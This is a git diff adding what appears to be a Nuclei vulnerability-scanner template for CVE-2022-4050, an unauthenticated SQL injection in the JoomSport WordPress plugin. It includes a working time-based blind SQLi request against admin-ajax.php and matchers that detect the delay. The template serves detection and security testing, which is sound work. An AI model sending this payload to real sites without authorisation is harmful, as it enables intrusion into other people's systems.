diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml new file mode 100644 index 0000000000..12ac0b3770 --- /dev/null +++ b/cves/2022/CVE-2022-4050.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-4050 + +info: + name: JoomSport < 5.2.8 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f + - https://wordpress.org/plugins/joomsport-sports-league-results-management/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 + classification: + cve-id: CVE-2022-4050 + metadata: + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth + +requests: + - raw: + - | + @timeout: 15s + POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"} + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "jscaruselcont jsview2")' + condition: and